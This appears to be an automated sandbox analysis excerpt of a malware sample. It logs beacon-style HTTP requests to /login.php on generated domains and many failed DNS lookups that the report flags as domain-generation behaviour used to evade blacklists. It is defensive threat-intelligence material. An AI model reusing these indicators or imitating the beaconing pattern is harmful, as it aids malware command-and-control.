Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Cookie: snkz=66.23.206.109; btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347463|1731347428|17|2|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478893028933998491
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347479|1731347428|7|5|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Cookie: snkz=66.23.206.109; btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347463|1731347428|17|2|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347479|1731347428|9|4|0
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Cookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347479|1731347428|9|4|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347479|1731347428|7|5|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Cookie: snkz=66.23.206.109; btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347463|1731347428|17|2|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Cookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347479|1731347428|9|4|0
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Cookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347479|1731347428|9|4|0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478893028933998491
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive
Queries random domain names (often used to prevent blacklisting and sinkholes)
Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
Tries to resolve many domain names, but no domain seems valid
Source: unknownDNS traffic detected: query: puzypug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexysig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumytup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahynus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyjux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebylov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofydac.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupytyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupydig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyriq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyxyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufybyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volydot.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyvah.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetytug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvyxil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufymyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purywop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrygyn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonymuf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofyqit.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyxyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyret.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujymip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyvuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galypyh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyfyb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyxuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyzuw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumywaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyhuz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowydef.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqysag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volykit.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonycum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyxul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyrip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacykeh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowybof.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyneh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxymed.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryfyd.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyvoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyhup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyhis.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysymux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyrol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadypuw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojybim.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyvob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyheq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyrib.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekykup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryxij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocycuc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexykug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyzef.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyfaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyfel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofygum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahykih.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqykab.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyzuf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvymul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyveg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofykoc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopycom.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykygaj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacykub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojygok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowykaf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowymyk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyvin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyrap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonydik.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatycoh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofymik.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvyjop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purydyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyzuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyqih.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegytyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojykom.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopykak.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxylor.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofygaf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymylyr.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyhez.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedynaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujygaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatydaw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygywor.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysywon.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyquw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyvud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysysod.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyrab.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegysoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegynap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufygug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyfyj.com replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: puvyliv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyvyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyfop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyfyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purycap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purydip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyveb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofybyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyvil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvylod.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purycul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyfuh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyqok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyjim.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrytod.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volypum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykymox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyhiw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedysov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacypyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupypiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purytyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyxov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganydiw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryvex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyjoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyvod.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufyjuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonypyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyzoh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqykog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowydic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyrom.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyqow.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyjuf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumyjig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetylyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volymum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumybal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyzek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumymuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrytun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymymud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyquq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganycuh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyvas.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykynyj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyqog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volymaf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopybyt.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvylyn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyhob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebysul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacydib.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocymut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyzys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyduz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupygel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebytiq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupymyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatynes.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyqat.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyjyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyqaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupycuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvywed.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahypus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyjof.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahycib.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyzyh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexylup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojymic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumypog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyryc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzybep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyzas.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyrif.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyhyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyjut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufydep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyhyw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysytyr.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyfar.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufypiq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyrev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacynuz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykytej.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowycac.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purypol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyjun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganykaz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyrak.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryjir.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvytuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyjic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyqiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyvis.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujypup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegykiq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykygur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyduh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyhuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganypih.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyrag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowypit.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyqub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyryw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyqyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryled.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqynyw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puryjil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyjaj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupywog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyfah.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyhev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocydof.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonygec.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purygeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqytal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyqys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekysip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykymyr.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebynyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyjyc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujygul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzytap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyfob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqytup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufywil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatycyb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqycos.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyxyd.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowygem.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqypew.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyhil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyfow.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegylep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyvep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahynaz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexykaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyfir.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacycus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumycug.com replaycode: Name error (3)
